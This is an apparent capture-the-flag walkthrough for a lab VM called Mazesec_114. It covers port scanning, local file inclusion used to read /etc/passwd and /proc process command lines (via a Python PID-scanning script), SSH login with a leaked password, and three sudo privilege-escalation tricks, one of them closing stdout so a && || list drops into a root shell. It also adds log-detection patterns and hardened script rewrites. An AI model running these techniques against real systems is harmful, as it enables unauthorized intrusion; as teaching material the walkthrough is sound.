Mazesec_114

Target source: QQ group 660930334

Difficulty: Easy

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:21 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00059s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00038s latency).
MAC Address: 08:00:27:38:83:7B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.51
Host is up (0.00094s latency).
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 4.10 seconds

Target IP: 192.168.2.51

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.51
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:22 +0800
Nmap scan report for 192.168.2.51
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.89 seconds

Open ports: 22, 80

(2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.51
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:22 +0800
Nmap scan report for 192.168.2.51
Host is up (0.00090s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Welcome
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.30 seconds

(3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.51
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 14:23 +0800
Nmap scan report for 192.168.2.51
Host is up (0.0024s latency).
All 100 scanned ports on 192.168.2.51 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:C2:E0:E4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 56.04 seconds

II. Web penetration

1. Website on port 80

Visiting port 80 shows nothing of interest.

2. Directory scanning

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.51 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.51
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: php,txt,html,bak,md,db,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 615]
file.php (Status: 500) [Size: 0]
server-status (Status: 403) [Size: 277]
Progress: 1764464 / 1764464 (100.00%)
===============================================================
Finished
===============================================================

A file named file.php exists but answers with status 500 rather than 200, which points to a file inclusion whose required parameter is missing.

3. ffuf

Fuzz for the name of the parameter that file.php expects:

┌──(root㉿kali)-[~/miaosec]
└─# ffuf -u "http://192.168.2.51/file.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 20 -ac

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.2.51/file.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 20
________________________________________________

file [Status: 200, Size: 1394, Words: 13, Lines: 27, Duration: 10ms]

The parameter is named file.

4. Local file inclusion (LFI)

Try the inclusion by reading /etc/passwd:

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.51/file.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/ba

This yields the username welcome.

Traversal to the usual files returned nothing useful, so the next step is to read process information (/proc/<pid>/cmdline and /proc/<pid>/status) through the inclusion. The scanning script below was generated with an AI assistant.

#!/usr/bin/env python3
import requests
import sys
import time
from urllib.parse import quote

# Target URL template (keep the {path} placeholder)
TARGET_URL = "http://192.168.2.51/file.php/?file={path}"

# PID range to probe (adjust as needed)
PID_MIN = 1
PID_MAX = 3000  # a typical system does not have more than a few thousand live processes

# Request timeout (seconds)
TIMEOUT = 5

# Encode the path to get past simple filters (optional)
def encode_path(path):
    # single or double encoding, depending on the target
    return quote(path)  # single layer of URL encoding

def fetch_file(payload_path):
    """Send the request and return the response body, or None on a non-200 status or a request error"""
    url = TARGET_URL.format(path=encode_path(payload_path))
    try:
        resp = requests.get(url, timeout=TIMEOUT)
        if resp.status_code == 200:
            return resp.text
        else:
            return None
    except Exception as e:
        print(f"[!] 请求失败: {e}")
        return None

def parse_cmdline(content):
    """Parse /proc/<pid>/cmdline (arguments are NUL-separated)"""
    if not content:
        return ""
    return repr(content.replace('\x00', ' ').strip())

def parse_status(content):
    """Extract the Name, Pid, PPid and Uid fields from /proc/<pid>/status"""
    if not content:
        return {}
    info = {}
    for line in content.splitlines():
        if line.startswith(('Name:', 'Pid:', 'PPid:', 'Uid:')):
            key, val = line.split(':', 1)
            info[key.strip()] = val.strip()
    return info

def main():
    print(f"[*] 开始扫描 PID {PID_MIN} 到 {PID_MAX}...")
    found_pids = []

    for pid in range(PID_MIN, PID_MAX + 1):
        cmdline_path = f"../../../proc/{pid}/cmdline"
        status_path = f"../../../proc/{pid}/status"

        cmdline_raw = fetch_file(cmdline_path)
        status_raw = fetch_file(status_path)

        # Treat the PID as a live process if either file has content
        if cmdline_raw or status_raw:
            cmdline = parse_cmdline(cmdline_raw) if cmdline_raw else "(无 cmdline)"
            status_info = parse_status(status_raw) if status_raw else {}

            name = status_info.get('Name', 'Unknown')
            ppid = status_info.get('PPid', 'N/A')
            uid = status_info.get('Uid', 'N/A')

            print(f"[+] PID {pid}: Name={name}, CmdLine={cmdline}, PPid={ppid}, UID={uid}")
            found_pids.append(pid)

        # Optional: delay between requests to avoid rate limiting
        # time.sleep(0.05)

    print(f"\n[✓] 扫描完成,共发现 {len(found_pids)} 个有效进程。")
    if found_pids:
        print("发现的 PID 列表:", found_pids)

if __name__ == "__main__":
    main()

Scan results:

┌──(root㉿kali)-[~/miaosec]
└─# python3 lfi_proc_scan.py
[*] 开始扫描 PID 1 到 3000...
[+] PID 1: Name=systemd, CmdLine='/sbin/init', PPid=0, UID=0 0 0 0
[+] PID 2: Name=kthreadd, CmdLine=(无 cmdline), PPid=0, UID=0 0 0 0
[+] PID 3: Name=rcu_gp, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 4: Name=rcu_par_gp, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 6: Name=kworker/0:0H-kblockd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 8: Name=mm_percpu_wq, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 9: Name=ksoftirqd/0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 10: Name=rcu_sched, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 11: Name=rcu_bh, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 12: Name=migration/0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 14: Name=cpuhp/0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 15: Name=kdevtmpfs, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 16: Name=netns, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 17: Name=kauditd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 18: Name=khungtaskd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 19: Name=oom_reaper, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 20: Name=writeback, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 21: Name=kcompactd0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 22: Name=ksmd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 23: Name=khugepaged, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 24: Name=crypto, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 25: Name=kintegrityd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 26: Name=kblockd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 27: Name=edac-poller, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 28: Name=devfreq_wq, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 29: Name=watchdogd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 32: Name=kswapd0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 50: Name=kthrotld, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 51: Name=ipv6_addrconf, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 61: Name=kstrp, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 112: Name=ata_sff, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 114: Name=scsi_eh_0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 116: Name=scsi_tmf_0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 118: Name=scsi_eh_1, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 119: Name=scsi_tmf_1, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 121: Name=scsi_eh_2, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 124: Name=scsi_tmf_2, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 125: Name=kworker/u2:3-flush-8:0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 160: Name=kworker/0:1H-kblockd, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 190: Name=kworker/u3:0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 192: Name=jbd2/sda1-8, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 193: Name=ext4-rsv-conver, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 227: Name=systemd-journal, CmdLine='/lib/systemd/systemd-journald', PPid=1, UID=0 0 0 0
[+] PID 248: Name=systemd-udevd, CmdLine='/lib/systemd/systemd-udevd', PPid=1, UID=0 0 0 0
[+] PID 299: Name=ttm_swap, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 300: Name=irq/18-vmwgfx, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 317: Name=dhclient, CmdLine='/sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3', PPid=1, UID=0 0 0 0
[+] PID 385: Name=systemd-timesyn, CmdLine='/lib/systemd/systemd-timesyncd', PPid=1, UID=101 101 101 101
[+] PID 388: Name=sd-resolve, CmdLine='/lib/systemd/systemd-timesyncd', PPid=1, UID=101 101 101 101
[+] PID 389: Name=cron, CmdLine='/usr/sbin/cron -f', PPid=1, UID=0 0 0 0
[+] PID 390: Name=dbus-daemon, CmdLine='/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only', PPid=1, UID=104 104 104 104
[+] PID 393: Name=sleep, CmdLine='service --user welcome --password 6WXqj9Vc2tdXQ3TN0z54 --host localhost --port 8080 infinity', PPid=1, UID=65534 65534 65534 65534
[+] PID 394: Name=rsyslogd, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0 0 0 0
[+] PID 403: Name=systemd-logind, CmdLine='/lib/systemd/systemd-logind', PPid=1, UID=0 0 0 0
[+] PID 407: Name=agetty, CmdLine='/sbin/agetty -o -p -- \\u --noclear tty1 linux', PPid=1, UID=0 0 0 0
[+] PID 408: Name=in:imuxsock, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0 0 0 0
[+] PID 409: Name=in:imklog, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0 0 0 0
[+] PID 410: Name=rs:main Q:Reg, CmdLine='/usr/sbin/rsyslogd -n -iNONE', PPid=1, UID=0 0 0 0
[+] PID 411: Name=sshd, CmdLine='sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups', PPid=1, UID=0 0 0 0
[+] PID 425: Name=unattended-upgr, CmdLine='/usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal', PPid=1, UID=0 0 0 0
[+] PID 426: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=1, UID=0 0 0 0
[+] PID 463: Name=gmain, CmdLine='/usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal', PPid=1, UID=0 0 0 0
[+] PID 581: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 589: Name=kworker/0:1-events, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 712: Name=kworker/u2:0-flush-8:0, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 779: Name=kworker/0:2-ata_sff, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0
[+] PID 780: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 783: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 798: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 802: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 804: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 814: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 819: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 822: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 830: Name=apache2, CmdLine='/usr/sbin/apache2 -k start', PPid=426, UID=33 33 33 33
[+] PID 848: Name=kworker/0:0-ata_sff, CmdLine=(无 cmdline), PPid=2, UID=0 0 0 0

[✓] 扫描完成,共发现 76 个有效进程。
发现的 PID 列表: [1, 2, 3, 4, 6, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 32, 50, 51, 61, 112, 114, 116, 118, 119, 121, 124, 125, 160, 190, 192, 193, 227, 248, 299, 300, 317, 385, 388, 389, 390, 393, 394, 403, 407, 408, 409, 410, 411, 425, 426, 463, 581, 589, 712, 779, 780, 783, 798, 802, 804, 814, 819, 822, 830, 848]

The password of user welcome, 6WXqj9Vc2tdXQ3TN0z54, is exposed in the command line of PID 393:

[+] PID 393: Name=sleep, CmdLine='service --user welcome --password 6WXqj9Vc2tdXQ3TN0z54 --host localhost --port 8080 infinity', PPid=1, UID=65534      65534   65534   65534
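From the defender's side, the probing above leaves a distinctive trace in the web server log: a traversal read of /etc/passwd, then two requests per PID against /proc. The following detection logic is an added example, not part of the original writeup; it runs over constructed Apache combined-format log lines (the IPs, timestamps, sizes and the burst threshold are made up for the example) and assumes a POSIX awk.

```shell
#!/bin/sh
# Constructed sample of an Apache "combined" access log with the kind of
# requests this walkthrough generates (values are made up for the example).
sample_log() {
    cat <<'EOF'
192.168.2.4 - - [19/Jan/2026:14:30:01 +0800] "GET /index.html HTTP/1.1" 200 615 "-" "Mozilla/5.0"
192.168.2.4 - - [19/Jan/2026:14:31:12 +0800] "GET /file.php?file=../../../../etc/passwd HTTP/1.1" 200 1394 "-" "curl/8.5.0"
192.168.2.4 - - [19/Jan/2026:14:35:40 +0800] "GET /file.php/?file=../../../proc/1/cmdline HTTP/1.1" 200 11 "-" "python-requests/2.31.0"
192.168.2.4 - - [19/Jan/2026:14:35:40 +0800] "GET /file.php/?file=../../../proc/1/status HTTP/1.1" 200 980 "-" "python-requests/2.31.0"
192.168.2.9 - - [19/Jan/2026:14:36:02 +0800] "GET /file.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1394 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Jan/2026:14:40:00 +0800] "GET /file.php?file=about HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
}

# lfi_hits <logfile>: one line per suspicious file.php request, printed as
#   <client-ip> <reasons> <request-target>
# In combined format $7 is the request target; simple %2e/%2f encoding is
# undone before matching so the encoded variant is caught too.
lfi_hits() {
    awk '
    index(tolower($7), "file.php") {
        path = tolower($7)
        gsub(/%2e/, ".", path); gsub(/%2f/, "/", path)
        reason = ""
        if (index(path, "..") > 0)          reason = reason "traversal,"
        if (index(path, "/proc/") > 0)      reason = reason "proc,"
        if (index(path, "/etc/passwd") > 0) reason = reason "passwd,"
        if (reason != "") { sub(/,$/, "", reason); print $1, reason, $7 }
    }' "$1"
}

# lfi_burst <logfile> [threshold]: clients with at least <threshold> file.php
# requests (default 50). The PID scanner sends two requests per PID, so a
# single client issuing thousands of file.php requests stands out.
lfi_burst() {
    awk -v min="${2:-50}" '
    index($7, "file.php") { n[$1]++ }
    END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }' "$1"
}

# Run directly: write the sample to a temp file and report on it.
lfi_demo() {
    log=$(mktemp) || return 1
    sample_log > "$log"
    echo "== suspicious requests =="; lfi_hits "$log"
    echo "== clients with >= 3 file.php requests =="; lfi_burst "$log" 3
    rm -f "$log"
}
lfi_demo
```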

III. Getting a shell as welcome

Log in with the recovered credential:

┌──(root㉿kali)-[~/miaosec]
└─# ssh welcome@192.168.2.51
welcome@114:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)

IV. Privilege escalation

Check sudo -l:

welcome@114:~$ sudo -l
Matching Defaults entries for welcome on 114:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User welcome may run the following commands on 114:
(ALL) NOPASSWD: /opt/read.sh
(ALL) NOPASSWD: /opt/short.sh

Look at /opt/read.sh:

welcome@114:~$ cat /opt/read.sh 
#!/bin/bash

echo "Input the flag:"
if head -1 | grep -q "$(< /root/root.txt)"
then
echo "Y"
else
echo "N"
fi

Look at /opt/short.sh:

welcome@114:~$ cat /opt/short.sh 
#!/bin/bash

PATH=/usr/bin
My_guess=$RANDOM

echo "This is script logic"
cat << EOF
if [ "$1" != "$My_guess" ] ;then
echo "Nop";
else
bash -i;
fi
EOF

[ "$1" != "$My_guess" ] && echo "Nop" || bash -i

Option 1: via short.sh

The script's secret is a random number: My_guess=$RANDOM. In Bash, $RANDOM yields an integer between 0 and 32767. When the argument equals that value the script drops into a shell, so call it in a loop with a fixed guess until a run matches:

while true; do sudo /opt/short.sh 1024; done

Once a run matches, the loop lands in a root shell:

....
This is script logic
if [ "1024" != "20138" ] ;then
echo "Nop";
else
bash -i;
fi
Nop
This is script logic
if [ "1024" != "1024" ] ;then
echo "Nop";
else
bash -i;
fi
root@114:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)

Option 2: via read.sh

Reading the flag from a process's argument list

When read.sh runs, it spawns a grep process whose pattern argument is the content of /root/root.txt, so the flag sits in that process's command line. Run the script, leave it waiting at the prompt, and list the processes from a second terminal:

welcome@114:~$ sudo /opt/read.sh
Input the flag:
welcome@114:~$ ps -aux | grep grep
root 4958 0.0 0.0 6320 636 pts/0 S+ 23:33 0:00 grep -q flag{root-c3dbe270140775bb9fc6eaa2559f914f}
welcome 4961 0.0 0.0 6176 696 pts/1 S+ 23:33 0:00 grep grep

Option 3: >&-

sudo /opt/short.sh '1' >&-

The key is the trailing >&-. In a Linux shell, >&- closes standard output (STDOUT).

[ "$1" != "$My_guess" ] && echo "Nop" || bash -i

With a wrong guess, control passes to bash -i only if echo "Nop" fails.

Because standard output is already closed at that point, echo cannot write anything and fails, so execution falls through to bash -i:

welcome@114:~$ sudo /opt/short.sh '1' >&-
/opt/short.sh: line 6: echo: write error: Bad file descriptor
cat: write error: Bad file descriptor
/opt/short.sh: line 15: echo: write error: Bad file descriptor

Standard output is still closed in the new shell, so restore a usable one:

root@114:/home/welcome# id
id: write error: Bad file descriptor
root@114:/home/welcome# /bin/bash -i >&2 2>&2

Root obtained:

root@114:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)
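Both escalation paths come down to two scripting mistakes. The following block is an added example, not the box's scripts nor code from the writeup: it reproduces the && / || list from short.sh that lets a failed echo select the privileged branch (Option 3) and the grep argument from read.sh that exposes the flag in ps output (Option 2), each beside a hardened form. It assumes a POSIX shell; the privileged action is replaced by a return code, and the secret file is constructed in a temp directory.

```shell
#!/bin/sh
# --- short.sh pattern: [ "$1" != "$My_guess" ] && echo "Nop" || bash -i ---
# A && B || C runs C whenever B fails, not only when A fails. With stdout
# closed (>&-), echo fails, so a wrong guess still reaches C.
# Returns 0 when the privileged branch would run, 1 otherwise.
guess_andor() {
    [ "$1" != "$2" ] && echo "Nop" || return 0
    return 1
}

# Hardened form: the branch depends only on the comparison; a failing echo
# cannot change control flow. (short.sh prints this if/else shape in its
# heredoc but then re-implements it with && / ||.)
guess_ifelse() {
    if [ "$1" != "$2" ]; then
        echo "Nop"
        return 1
    fi
    return 0
}

# --- read.sh pattern: head -1 | grep -q "$(< /root/root.txt)" ---
# The secret becomes an argument of grep, visible to every local user via
# ps and /proc/<pid>/cmdline. Reading the pattern from a file (-f) keeps it
# out of argv; -x -F make it an exact, whole-line, non-regex comparison.
# check_flag_file <candidate> <secret-file>: returns 0 on a match.
check_flag_file() {
    printf '%s\n' "$1" | grep -qxF -f "$2"
}

# Self-check when run directly (secret value constructed for the example).
hardening_demo() {
    tmp=$(mktemp -d) || return 1
    printf 'flag{constructed-example}\n' > "$tmp/root.txt"
    check_flag_file 'flag{constructed-example}' "$tmp/root.txt" && echo "Y"
    check_flag_file 'flag{wrong}' "$tmp/root.txt" || echo "N"
    # wrong guess with stdout closed: only the && / || form grants access
    guess_andor 1 2 >&- 2>/dev/null && echo "andor: granted with stdout closed" >&2
    guess_ifelse 1 2 >&- 2>/dev/null || echo "ifelse: denied with stdout closed" >&2
    rm -rf "$tmp"
}
hardening_demo
```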

V. Flags

root@114:/home/welcome# cat /root/root.txt /home/welcome/user.txt 
flag{root-c3dbe270140775bb9fc6eaa2559f914f}
flag{user-210f652e7e3b7e7359e523ef04e96295}

Mazesec_114
http://miao-sec.github.io/Maze-sec/Mazesec_114/
Author
Miao
Published
19 January 2026
License
BY-MIAO